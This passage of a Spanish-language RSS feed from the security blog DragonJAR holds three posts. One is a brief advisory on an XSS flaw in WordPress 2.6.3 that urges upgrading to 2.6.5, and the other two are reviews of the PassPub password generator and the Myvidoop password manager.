href="http://www.dragonjar.org/revista-uxi-la-revista-de-software-libre-y-codigo-abierto-de-la-uci.xhtml" title="Revista UXi, La Revista de Software Libre y Código Abierto de la UCI">Revista UXi, La Revista de Software Libre y Código Abierto de la UCI</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/curso-de-redes-en-gnu-linux.xhtml/feed</wfw:commentRss>
		<slash:comments>11</slash:comments>
		</item>
		<item>
		<title>WordPress 2.6.3 vulnerable a Cross Site Scripting</title>
		<link>http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml</link>
		<comments>http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml#comments</comments>
		<pubDate>Thu, 08 Jan 2009 10:48:02 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Noticias Seguridad]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[Bug]]></category>
		<category><![CDATA[Seguridad]]></category>
		<category><![CDATA[Vulnerabilidad]]></category>
		<category><![CDATA[WordPress]]></category>
		<category><![CDATA[XSS]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=1793</guid>
		<description><![CDATA[
Gracias a blogsecurity y a ayudawordpress me entero de una vulnerabilidad descubierta por Jeremias Reith en WordPress 2.6.3  que podría permitir a un atacante sin identificar acceder a tu blog.
El fallo se encuentra en la funcion &#8220;self_link() &#8220;del  archivo &#8220;wp-includes/feed.php&#8221; que al no validar correctamente los parametros de entrada permite realizar un ataque XSS con [...]]]></description>
			<content:encoded><![CDATA[<p style="text-align: center;"><img class="aligncenter" src="http://img123.imageshack.us/img123/19/xssvb6.jpg" alt="Vulnerabilidad en WordPress" title="WordPress 2.6.3 vulnerable a Cross Site Scripting" /></p>
<p>Gracias a <a rel="nofollow" target="_blank" href="http://blogsecurity.net/wordpress/wordpress/">blogsecurity</a> y a <a rel="nofollow" target="_blank" href="http://ayudawordpress.com/problema-de-seguridad-en-wordpress-263/">ayudawordpress</a> me entero de una vulnerabilidad descubierta por Jeremias Reith en WordPress 2.6.3  que podría permitir a un atacante sin identificar acceder a tu blog.</p>
<p>El fallo se encuentra en la funcion &#8220;self_link() &#8220;del  archivo &#8220;wp-includes/feed.php&#8221; que al no validar correctamente los parametros de entrada permite realizar un ataque XSS con el que se pueden acceder a las cookies del usuario y obtener privilegios de administrador.<span id="more-1793"></span></p>
<p>Este problema <a rel="nofollow" target="_blank" href="http://es.wordpress.org/wordpress-2.6.5-es_ES.zip" target="_blank">se solucionó en la versión WordPress 2.6.5</a>, si no quieres dar todavia el paso a la version 2.7 de wordpress es recomendable que actualices tu version a la 2.6.5 para resolver este problema de seguridad.</p>
<p>Jeremias ha publicado un aviso en <a rel="nofollow" target="_blank" href="http://seclists.org/bugtraq/2008/Nov/0209.html" target="_blank">Bugtraq</a>, en el que se explica en detalla tecnicamente el error e incluye un una <a rel="nofollow" target="_blank" href="http://blogsecurity.net/wordpress/wordpress/" target="_blank">prueba de concepto</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/xss-en-wordpress-2-8-1-actualiza-a-wordpress-2-8-2.xhtml" title="XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2">XSS en WordPress 2.8.1, Actualiza a WordPress 2.8.2</a></li><li><a href="http://www.dragonjar.org/xss-que-permite-postear-en-wordpress.xhtml" title="XSS que permite postear a atacante registrado en WordPress">XSS que permite postear a atacante registrado en WordPress</a></li><li><a href="http://www.dragonjar.org/dos-en-wordpress.xhtml" title="Denegacion de Servicio en WordPress">Denegacion de Servicio en WordPress</a></li><li><a href="http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml" title="Reseteo Remoto del Password de Admin en WordPress">Reseteo Remoto del Password de Admin en WordPress</a></li><li><a href="http://www.dragonjar.org/problemas-de-seguridad-en-wordpress-2-8-2-actualiza-a-wordpress-2-8-3.xhtml" title="Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3">Problemas de Seguridad en WordPress 2.8.2, Actualiza a WordPress 2.8.3</a></li><li><a href="http://www.dragonjar.org/los-blogs-alojados-en-wordpresscom-vulnerables.xhtml" title="Los Blogs alojados en WordPress.com Vulnerables ">Los Blogs alojados en WordPress.com Vulnerables </a></li><li><a href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/wordpress-263-vulnerable-a-xss.xhtml/feed</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>PassPub, Generador de Contraseñas Seguras</title>
		<link>http://www.dragonjar.org/passpub-generador-de-contrasenas-seguras.xhtml</link>
		<comments>http://www.dragonjar.org/passpub-generador-de-contrasenas-seguras.xhtml#comments</comments>
		<pubDate>Sun, 06 Jan 2008 23:45:25 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[General]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[Contraseñas]]></category>
		<category><![CDATA[Gratis]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=446</guid>
		<description><![CDATA[Anteriormente les había hablado sobre Myvidoop una aplicación web que permite administrar nuestras contraseñas fácilmente.
Hoy les presento PassPub una herramienta que nos permite generar contraseñas seguras sin mucho esfuerzo y con una interface sencilla y amigable.

Recordemos que un password seguro debe sobrepasar los 6 caracteres combinando números, letras y símbolos (4qu1.µn3j3mp!0.de.p@ssw0rd.s3gµr0) dificultando asi la tarea [...]]]></description>
			<content:encoded><![CDATA[<p>Anteriormente les había hablado sobre <a rel="nofollow" target="_blank" href="../maneja-tus-contrasenas-de-forma-sencilla.xhtml">Myvidoop</a> una aplicación web que permite administrar nuestras contraseñas fácilmente.</p>
<p>Hoy les presento <a rel="nofollow" target="_blank" href="../passpub-generador-de-contrasenas-seguras.xhtml">PassPub</a> una herramienta que nos permite generar contraseñas seguras sin mucho esfuerzo y con una interface sencilla y amigable.</p>
<p style="text-align: center;"><img src="http://farm3.static.flickr.com/2019/2172809351_cbe2f31cce_o.jpg" alt="Generar Contraseñas" width="400" height="112" title="PassPub, Generador de Contraseñas Seguras " /><span id="more-446"></span></p>
<p>Recordemos que un password seguro debe sobrepasar los 6 caracteres combinando números, letras y símbolos (4qu1.µn3j3mp!0.de.p@ssw0rd.s3gµr0) dificultando asi la tarea de recuperar este por métodos como fuerza bruta, obviamente este tipo de contraseñas es mucho mas difícil de recordar que “micontrasena1″ pero es mucho mas seguro (ademas para administrar nuestras contraseñas tenemos <a rel="nofollow" target="_blank" href="../maneja-tus-contrasenas-de-forma-sencilla.xhtml">Myvidoop</a>)</p>
<p><a rel="nofollow" target="_blank" href="../passpub-generador-de-contrasenas-seguras.xhtml">PassPub</a> nos permite generar contraseñas de 64, 128 o 256bits para redes inalambricas, también podemos generar passwords de 6, 8, 10 o 12 caracteres de longitud, convinaciones basadas en la tabla periodica y otras convinaciones.</p>
<p><a rel="nofollow" target="_blank" href="http://anonym-url.com/go.php?to=https://passpub.com">Generar Passwords con PassPub</a></p>
<p>Mas Información:<br />
Puedes encontrar mas información en (<a rel="nofollow" target="_blank" href="http://www.puntogeek.com/2007/08/14/genera-contrasenas-al-azar-con-passpub/">I</a> <a rel="nofollow" target="_blank" href="http://www.opensecurity.es/passpub-generados-de-contrasenas-seguras/">II</a> <a rel="nofollow" target="_blank" href="http://noticiastech.com/wordpress/?p=13394">III</a> <a rel="nofollow" target="_blank" href="http://bitelia.com/2007/08/14/passpub-generador-de-contrasenas/">IV</a> <a rel="nofollow" target="_blank" href="http://www.dosbit.com/2007/08/20-passpub-%C2%BFno-quieres-pensarte-una-contrasena-generala">V</a>)</p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/maneja-tus-contrasenas-de-forma-sencilla.xhtml" title="Maneja tus Contraseñas de Forma Sencilla ">Maneja tus Contraseñas de Forma Sencilla </a></li><li><a href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a href="http://www.dragonjar.org/como-tomar-control-dominio-windows.xhtml" title="¿Cómo tomar control de un Dominio en Windows?">¿Cómo tomar control de un Dominio en Windows?</a></li><li><a href="http://www.dragonjar.org/como-recuperar-clave-mysql.xhtml" title="Como Recuperar Clave MySQL">Como Recuperar Clave MySQL</a></li><li><a href="http://www.dragonjar.org/generador-diccionarios-passwords.xhtml" title="CeWL &#8211; Generador de Diccionarios Personalizados">CeWL &#8211; Generador de Diccionarios Personalizados</a></li><li><a href="http://www.dragonjar.org/como-eliminar-la-contrasena-de-un-pdf.xhtml" title="¿Como Eliminar la Contraseña de un PDF?">¿Como Eliminar la Contraseña de un PDF?</a></li><li><a href="http://www.dragonjar.org/nueva-versin-de-cain-abel.xhtml" title="Nueva versión de Cain &#038; Abel">Nueva versión de Cain &#038; Abel</a></li><li><a href="http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml" title="Reseteo Remoto del Password de Admin en WordPress">Reseteo Remoto del Password de Admin en WordPress</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/passpub-generador-de-contrasenas-seguras.xhtml/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
		<item>
		<title>Maneja tus Contraseñas de Forma Sencilla</title>
		<link>http://www.dragonjar.org/maneja-tus-contrasenas-de-forma-sencilla.xhtml</link>
		<comments>http://www.dragonjar.org/maneja-tus-contrasenas-de-forma-sencilla.xhtml#comments</comments>
		<pubDate>Sun, 16 Dec 2007 23:07:12 +0000</pubDate>
		<dc:creator>DragoN</dc:creator>
				<category><![CDATA[Herramientas Seguridad]]></category>
		<category><![CDATA[Administrador]]></category>
		<category><![CDATA[Contrasena]]></category>
		<category><![CDATA[Gratis]]></category>
		<category><![CDATA[Password]]></category>
		<category><![CDATA[Web]]></category>

		<guid isPermaLink="false">http://www.dragonjar.org/?p=444</guid>
		<description><![CDATA[Una nueva herramienta online llega para ayudar a quienes olvidan frecuentemente su contraseña o quienes usan la misma para todo.
Myvidoop es una utilidad que nos permite almacenar todas nuestras contraseñas de servicios web (redes sociales, correos, foros, etc…) en un solo sitio y tras una sola clave (mas adelante veremos las ventajas y desventajas de [...]]]></description>
			<content:encoded><![CDATA[<p>Una nueva herramienta online llega para ayudar a quienes olvidan frecuentemente su contraseña o quienes usan la misma para todo.</p>
<p>Myvidoop es una utilidad que nos permite almacenar todas nuestras contraseñas de servicios web (redes sociales, correos, foros, etc…) en un solo sitio y tras una sola clave (mas adelante veremos las ventajas y desventajas de esto), esta clave única consta de un conjunto de imágenes en una especie de matriz, cuando seleccionemos la combinación correcta de imágenes, se nos rellenara el formulario de acceso del sitio en el que nos encontremos y de esta forma podremos ingresar.</p>
<p align="center"><img src="http://img101.imageshack.us/img101/6105/minitourgridxm8.png" alt="Adios a las Contraseñas" width="160" height="160" title="Maneja tus Contraseñas de Forma Sencilla " /><span id="more-444"></span></p>
<p>Myvidoop funciona gracias a un plugin que se integra con el navegador el cual almacena las claves de todos los servicios que tengamos asociados con Myvidoo.</p>
<p style="text-align: center;"><img src="http://farm3.static.flickr.com/2287/2111723453_f4440e2558.jpg" alt="Myvidoop" width="500" height="168" title="Maneja tus Contraseñas de Forma Sencilla " /></p>
<p>Myvidoop también funciona como identificación de OpenID, por lo que podrás usar tu cuenta Myvidoop para loguearte en cualquier pagina que cuente con los servicios de OpenID.</p>
<p>Tenemos a disposición un panel desde el cual podremos agregar las contraseñas para los servicios deseados, agrupar y gestionar contraseñas, ver y activar las ips desde donde vamos a utilizar el servicio y otras funciones.</p>
<p style="font-weight: bold;">PRO`s</p>
<ul>
<li>Podrás utilizar claves seguras (números, letras, caracteres etc) de la longitud que desees sin preocuparte de olvidar luego esta clave.</li>
<li>Es portable, solo tienes que instalar el plugin en el navegador que te encuentres, acceder a tu cuenta y hay tendrá tus claves.</li>
<li>Adiós a los keyloggers, al no digitar tu password bajas considerablemente el riesgo a que te quiten tus claves por este medio (ojo, existen keyloggers que pueden capturar la pantalla o grabar vídeo, a estos si sos vulnerable).</li>
<li>Es muy fácil de usar.</li>
</ul>
<p><strong>CONTRAS</strong></p>
<ul>
<li> Tendremos que confiar en la ética de Myvidoop, ¿quien nos garantiza que no usen nuestros datos?.</li>
<li>En caso de ser atacado el portal dejamos al descubierto todos nuestras contraseñas a disposición de un atacante (no estoy diciendo que no cuenten con la seguridad necesaria para prestar un servicio como este, solo digo… en el peor de los casos).</li>
</ul>
<p>Con esta herramienta es mucho mas fácil seguir consejos de seguridad tan simples como utilizar una clave diferente para cada portal, o usar números, letras y símbolos en nuestras contraseñas.</p>
<p><strong>Para mas información:</strong><br />
<a rel="nofollow" target="_blank" href="https://myvidoop.com/">Pagina Oficial de Myvidoop</a><br />
<a rel="nofollow" target="_blank" href="https://myvidoop.com/videos/site-tour#site-tour">Aquí un vídeo donde explican cono funciona el sistema.</a></p>
<h3  class="related_post_title">También puede interesarte...</h3><ul class="related_post"><li><a href="http://www.dragonjar.org/passpub-generador-de-contrasenas-seguras.xhtml" title="PassPub, Generador de Contraseñas Seguras ">PassPub, Generador de Contraseñas Seguras </a></li><li><a href="http://www.dragonjar.org/robando-claves-por-xss-del-administrador-de-contrasenas-del-firefox.xhtml" title="Robando claves por XSS del Administrador de Contraseñas del Firefox">Robando claves por XSS del Administrador de Contraseñas del Firefox</a></li><li><a href="http://www.dragonjar.org/resetear-password-de-root.xhtml" title="Resetear Password de Root">Resetear Password de Root</a></li><li><a href="http://www.dragonjar.org/reseteo-remoto-del-password-de-admin-en-wordpress.xhtml" title="Reseteo Remoto del Password de Admin en WordPress">Reseteo Remoto del Password de Admin en WordPress</a></li><li><a href="http://www.dragonjar.org/webtunnel-herramienta-para-realizar-tunel-http.xhtml" title="Webtunnel &#8211; Herramienta para realizar Encapsulación HTTP ">Webtunnel &#8211; Herramienta para realizar Encapsulación HTTP </a></li><li><a href="http://www.dragonjar.org/descargar-gratis-internet-explorer-8-final.xhtml" title="Descargar Gratis Internet Explorer 8 Final">Descargar Gratis Internet Explorer 8 Final</a></li><li><a href="http://www.dragonjar.org/cursos-gratis-de-diseno-web-en-el-sena-virtual.xhtml" title="Cursos Gratis de Diseño Web en el Sena Virtual">Cursos Gratis de Diseño Web en el Sena Virtual</a></li><li><a href="http://www.dragonjar.org/recuperar-contrasenas-de-windows-vista-y-anteriores.xhtml" title=" Recuperar Contraseñas de Windows Vista y Anteriores"> Recuperar Contraseñas de Windows Vista y Anteriores</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.dragonjar.org/maneja-tus-contrasenas-de-forma-sencilla.xhtml/feed</wfw:commentRss>
		<slash:comments>3</slash:comments>
		</item>
	</channel>
</rss>
